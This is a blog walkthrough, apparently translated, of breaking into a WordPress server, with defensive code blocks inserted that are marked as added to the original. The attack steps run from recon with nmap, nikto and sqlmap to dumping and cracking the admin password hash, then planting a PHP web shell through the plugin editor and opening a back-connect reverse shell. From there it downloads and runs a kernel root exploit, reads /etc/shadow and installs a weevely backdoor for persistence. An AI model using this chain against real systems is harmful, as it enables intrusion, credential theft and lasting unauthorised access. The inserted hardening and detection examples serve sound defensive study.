How hackers have hacked into your site


This question is hard to answer briefly: there are many ways to break into a website. The purpose of this article is to demonstrate the techniques hackers commonly use to scan and compromise websites.

Suppose your site is hashlinux.com.

Let's ping this server:

We get an IP address, 173.236.138.113. This is the IP address of our target server.

Sameip.org can help us find other domains hosted on this same server.

Sites hosted on IP address 173.236.138.113

There are 26 sites on this server (173.236.138.113). Many hackers will attack a different site on the same server as a route into yours. For the purposes of this walkthrough we only go after your own server.

We need to gather the following information about your site:

1. DNS records (A, NS, TXT, MX and SOA)

2. Type of web server (Apache, IIS, Tomcat)

3. Domain name registration information (which company or person owns this domain)

4. Your name, address, email and phone number

5. The type of script running on your website (PHP, ASP, ASP.NET, JSP, CFM)

6. The server's operating system (Unix, Linux, Windows, Solaris)

7. Ports open on the server (80, 443, 21, etc.)

Now let's look up the DNS records for the site. We use the site who.is for this.

We found the site's DNS records:

Let's check the type of web server:

We can see that the web server is Apache. We'll check the Apache version later.

hashlinux.com site information

IP: 173.236.138.113
Website status: active
Server type: Apache
Alexa trend/rank: 1 month: 3,213,968; 3 month: 2,161,753
Page views per visit: 1 month: 2.0; 3 month: 3.7

Next we look up the domain name registration information:

This gives us the registrant and other important details. We can use WhatWeb to detect which scripting language your site uses, as well as the operating system type and the web server version.

We can see that the website runs WordPress, the operating system is Fedora Linux and the web server is Apache 2.2.15. Now let's check which ports are open on the server.

We use Nmap:

1. Detect which services are running on the server:

# nmap -sV hashlinux.com

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39
Nmap scan report for hashlinux.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 (Fedora)
MAC Address: 00:0C:29:01:8A:4D (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

2. Detect the server's OS:

# nmap -O hashlinux.com

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40
Nmap scan report for hashlinux.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

The server only has port 80 open, and the operating system is Linux 2.6.22 (Fedora Core 6).

Now that we have all the important information, let's do some vulnerability testing: SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF, etc.

We use nikto.pl to gather information and find weaknesses:

/pentest/web/nikto# perl nikto.pl -h http://hashlinux.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.1.2
+ Target Hostname:    hashlinux.com
+ Target Port:        80
+ Start Time:         2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time:           2011-12-29 06:50:37 (seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
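Each of the nikto findings above maps to an Apache directive. The fragment below is an added illustration, not part of the original article: the Fedora httpd.conf defaults that produce those findings, followed by the hardened equivalents (the /var/www/icons path is the stock Fedora alias and is assumed here).

```apache
# --- Settings behind the nikto findings (Fedora defaults, Apache 2.2) ---
# "Server: Apache/2.2.15 (Fedora)" reveals the exact version and distribution
ServerTokens OS
ServerSignature On
# TRACE is reflected back to the client: OSVDB-877 (XST)
TraceEnable On
# ETag built from the inode leaks filesystem details (the nikto ETag line)
FileETag INode MTime Size
# Directory listing and default README under /icons/: OSVDB-3268 / OSVDB-3233
Alias /icons/ "/var/www/icons/"
<Directory "/var/www/icons">
    Options Indexes MultiViews FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

# --- Hardened equivalents ---
ServerTokens Prod
ServerSignature Off
TraceEnable Off
FileETag MTime Size
# Drop the /icons/ alias entirely if nothing uses it; otherwise disable indexing
<Directory "/var/www/icons">
    Options -Indexes
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
```

The two halves are shown side by side for comparison and are not meant to be loaded together in one configuration.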

  


You can also use w3af, a tool found in BackTrack 5 R1:

/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
  Python version: 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) [GCC 4.4.3]
  GTK version: 2.20.1
  PyGTK version: 2.17.0

w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.

We enter the URL and select the full audit profile:

Wait a moment and the results will appear.

The site has SQL injection and other vulnerabilities.
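From the server's side, every scan on this page leaves a recognisable trace in the Apache access log. The following detector is an added example, not from the article: it parses combined-format log lines and tags the default nikto and w3af User-Agents (and sqlmap's, used later), TRACE requests, URL-decoded quote characters in query strings such as the ?cat=d'z"0 probe, and hits on the default /icons/ content. The log lines are constructed samples modelled on this walkthrough.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# How the scanners identify themselves unless the operator changes the User-Agent.
SCANNER_UA = ("nikto", "w3af", "sqlmap")

# Fragments that only show up in injection probes, checked after URL-decoding.
SQLI_CHARS = ("'", '"', "--", "/*", " union ", " or 1=1")

def classify(line):
    """Return a set of tags for one log line; an empty set means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return set()
    tags = set()
    ua = m["ua"].lower()
    if any(name in ua for name in SCANNER_UA):
        tags.add("scanner-ua")
    if m["method"] == "TRACE":
        tags.add("trace-method")        # XST probe; TRACE should be disabled anyway
    path = unquote(m["path"]).lower()
    if "?" in path and any(c in path.split("?", 1)[1] for c in SQLI_CHARS):
        tags.add("sqli-probe")
    if path.startswith("/icons/") and m["status"] == "200":
        tags.add("default-content")     # nikto requests /icons/ and /icons/README
    return tags

def scan(lines):
    """Aggregate tags per client IP over a batch of log lines."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        tags = classify(line)
        if m and tags:
            hits.setdefault(m["ip"], set()).update(tags)
    return hits

# Constructed sample lines (not real log data) shaped like the scans in this walkthrough.
SAMPLE = [
    '192.168.1.6 - - [29/Dec/2011:06:50:03 -0500] "GET / HTTP/1.1" 200 1475 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000001)"',
    '192.168.1.6 - - [29/Dec/2011:06:50:05 -0500] "TRACE / HTTP/1.1" 200 312 "-" "Mozilla/5.00 (Nikto/2.1.4)"',
    '192.168.1.6 - - [29/Dec/2011:06:50:09 -0500] "GET /icons/README HTTP/1.1" 200 5108 "-" "Mozilla/5.00 (Nikto/2.1.4)"',
    '192.168.1.6 - - [29/Dec/2011:07:02:11 -0500] "GET /Hackademic_RTB1/?cat=d%27z%220 HTTP/1.1" 200 3911 "-" "w3af.sourceforge.net"',
    '192.168.1.6 - - [29/Dec/2011:07:10:40 -0500] "GET /Hackademic_RTB1/?cat=1%20AND%201=1 HTTP/1.1" 200 4102 "-" "sqlmap/1.0-dev (http://sqlmap.sourceforge.net)"',
    '10.0.0.5 - - [29/Dec/2011:07:11:02 -0500] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 4102 "-" "Mozilla/5.0 (X11; Linux i686)"',
]

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE).items():
        print(ip, sorted(tags))
```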

Let's go deeper into the SQL injection:

http://hashlinux.com/Hackademic_RTB1/?cat=d%27z%220

This address is the injection point.

We'll use sqlmap to dump all the database information needed for the intrusion:

sqlmap -u URL

Wait for a moment:

Select "N" to continue:

The injection is error-based and the back-end database is MySQL 5.
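To show what the error-based injection on ?cat= looks like at the code level, here is an added example (not from the article and not WordPress code): a small SQLite stand-in for the category query, with the string-concatenated version beside a bound-parameter version, each probed with the same d'z"0 string w3af used. The table and rows are constructed.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the posts-by-category lookup behind ?cat=."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER, title TEXT, cat INTEGER)")
    db.executemany("INSERT INTO posts VALUES (?, ?, ?)",
                   [(1, "Hello world", 1), (2, "Hidden draft", 2)])
    return db

def posts_by_cat_vulnerable(db, cat):
    """String concatenation: the request parameter becomes part of the SQL text.
    A stray quote breaks the statement and the DB error reaches the response,
    which is exactly the signal an error-based scanner keys on."""
    sql = "SELECT id, title FROM posts WHERE cat = '" + cat + "'"
    return db.execute(sql).fetchall()

def posts_by_cat_fixed(db, cat):
    """Bound parameter: the value can never change the query structure.
    Validating the type first also stops the probe before it reaches the DB."""
    if not cat.isdigit():
        raise ValueError("cat must be an integer id")
    return db.execute("SELECT id, title FROM posts WHERE cat = ?", (int(cat),)).fetchall()

def probe(fn, cat):
    """Run one query function on a fresh DB and report what the response would reveal."""
    try:
        rows = fn(make_db(), cat)
        return ("rows", len(rows))
    except sqlite3.OperationalError as e:
        return ("db-error", str(e))     # error text leaks to the client
    except ValueError as e:
        return ("rejected", str(e))

if __name__ == "__main__":
    for cat in ("1", "d'z\"0", "' OR '1'='1"):
        print(repr(cat), probe(posts_by_cat_vulnerable, cat), probe(posts_by_cat_fixed, cat))
```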

Add the parameter --dbs to enumerate all the databases:

We found 3 databases:

Enumerate the WordPress database tables with -D wordpress --tables

We need to dump the wp_users table to get the user information and password hashes; then we can try to crack a password and finally log in to the WordPress back end.

Use the parameters -T wp_users --columns

22 columns were found:

Use the parameters -C user_login,user_pass --dump to dump those columns.

Then we get the account name and password hash.

Then use this website to convert the MD5 hash back to plaintext (not every hash can be recovered):

http://www.onlinehashcrack.com/free-hash-reverse.php

The plaintext password is: q1w2e3

User name: Georgemiller

Let's log in to the WordPress back end:




Now let's try uploading a PHP web shell so we can execute Linux commands on this server.

Edit the WordPress "Textile" plugin:

Replace the real plugin code with a PHP web shell, then click Upload. The PHP web shell is now on the server.

Now the PHP web shell is running. We can browse all the files on the site, but we want root on the server so we can move on to the other sites it hosts.

Select "Back-connect" in the PHP web shell and connect to our IP "192.168.1.6", port "5555".


Before we click connect, we must first listen on port 5555 on our own machine.

Click connect and we get a window like this:

Let's try some Linux commands:

id
uid=48(apache) gid=489(apache) groups=489(apache)

pwd
/var/www/html/hackademic_rtb1/wp-content/plugins

uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 GNU/Linux

The id command tells us our user ID and group.

The pwd command tells us where we are now.

The uname -a command gives us system information including the kernel version.

So we now know that the server's kernel version is 2.6.31.5-127.fc12.i686.

We can look for an exploit for this version on exploit-db.com.

Search for: "Kernel 2.6.31"

The first results are not suitable because they are not privilege escalation exploits. The next one is:

http://www.exploit-db.com/exploits/15285

Copy this link:

http://www.exploit-db.com/download/15285

In the netcat shell, enter:

wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01--  http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02--  http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'

     0K .......   100% 29.7K=0.2s

We use wget to fetch the exploit from exploit-db.com; -O saves it under the name roro.c.

Note:

Most Linux kernel exploits are written in C, so we save the file with a .c suffix. Opening the file shows the source code:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include
#include
#include
#include <errno.h>
#include <string.h>
#include
#include

#define RECVPORT 5555
#define SENDPORT 6666

int prep_sock(int port)
{
    int s, ret;
    struct sockaddr_in addr;

    s = socket(PF_RDS, SOCK_SEQPACKET, 0);

    if (s < 0) {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }

    memset(&addr, 0, sizeof(addr));

All the lines above show that the exploit is written in C.

After we have saved the exploit on the server, we compile it to an ELF binary:

gcc roro.c -o roro


Then execute the exploit:

./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

id

At this point we already have root privileges:

uid=0(root) gid=0(root)

We can read the /etc/shadow file:

cat /etc/shadow


Read the /etc/passwd file:

cat /etc/passwd


We could use John the Ripper to crack the users' passwords, but we won't do that here.

Hackers need to leave a backdoor on the server for easy access later.

Here we use weevely to generate a small, password-protected PHP backdoor, which we then upload to the server.

Weevely usage:

/pentest/backdoors/web/weevely# ./main.py -h
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Usage: main.py [options]

Options:
  -h, --help            show this help message and exit
  -g, --generate        Generate backdoor crypted code, requires -o and -p.
  -o OUTPUT, --output=OUTPUT
                        Output filename for generated backdoor.
  -c COMMAND, --command=COMMAND
                        Execute a single command and exit, requires -u and -p.
  -t, --terminal        Start a terminal-like session, requires -u and -p.
  -C CLUSTER, --cluster=CLUSTER
                        Start in cluster mode reading items from the given
                        file, in the form 'label,url,password' where label is
                        optional.
  -p PASSWORD, --password=PASSWORD
                        Password of the encrypted backdoor.
  -u URL, --url=URL     Remote backdoor URL.

Create a PHP backdoor with a password:

/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'hax.php' created with password 'koko'.

Upload the PHP backdoor via the PHP web shell.

Once the upload is complete, we connect to it with:

/pentest/backdoors/web/weevely# ./main.py -t -u http://hashlinux.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables.
[/var/www/html/hackademic_rtb1/wp-content/plugins]

Test our hax.php backdoor.

[via InfoSec Institute, translation by PPSBB]
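Both the plugin-editor web shell and the weevely backdoor above end up as PHP files inside wp-content/plugins, which is what the check below looks for. It is an added example, not from the article or from WordPress: it walks a plugins directory and flags PHP files that were modified after a known-good baseline, that call shell or eval-style functions, or that sit at the top level without a plugin header. The plugin tree, the harmless "textile" plugin and the dropped file are all constructed in a temporary directory.

```python
import os
import re
import tempfile
import time

# Functions a normal plugin rarely needs but dropped shells and obfuscated backdoors almost always call.
SUSPICIOUS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|base64_decode|gzinflate|str_rot13)\s*\(",
    re.IGNORECASE,
)

def scan_plugins(plugins_dir, baseline_mtime):
    """Return {relative_path: [reasons]} for PHP files that look like a dropped shell."""
    findings = {}
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(root, name)
            rel = os.path.relpath(full, plugins_dir)
            reasons = []
            if os.path.getmtime(full) > baseline_mtime:
                reasons.append("modified after baseline")
            with open(full, "r", errors="replace") as fh:
                src = fh.read()
            calls = sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(src)})
            if calls:
                reasons.append("calls " + ", ".join(calls))
            if "Plugin Name:" not in src and os.path.dirname(rel) == "":
                reasons.append("top-level PHP file without a plugin header")
            if reasons:
                findings[rel] = reasons
    return findings

def demo():
    """Constructed plugin tree: one ordinary plugin plus a dropped file with a shell's call signature."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "textile"))
    legit = os.path.join(base, "textile", "textile.php")
    with open(legit, "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Textile\n*/\nfunction textile_filter($t) { return $t; }\n")
    old = time.time() - 30 * 86400           # installed a month ago, before the baseline
    os.utime(legit, (old, old))
    with open(os.path.join(base, "hax.php"), "w") as fh:
        # Deliberately inert sample: carries the call names a shell would, does nothing.
        fh.write("<?php\nif (false) { system(''); eval(''); base64_decode(''); }\n")
    return scan_plugins(base, baseline_mtime=time.time() - 7 * 86400)

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

Setting define('DISALLOW_FILE_EDIT', true) in wp-config.php removes the plugin-editor route used above, so a file like this can no longer be written from the WordPress admin panel.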


This article is from the "Lakes and Laughter" blog; please keep this source link: http://hashlinux.blog.51cto.com/9647696/1793837
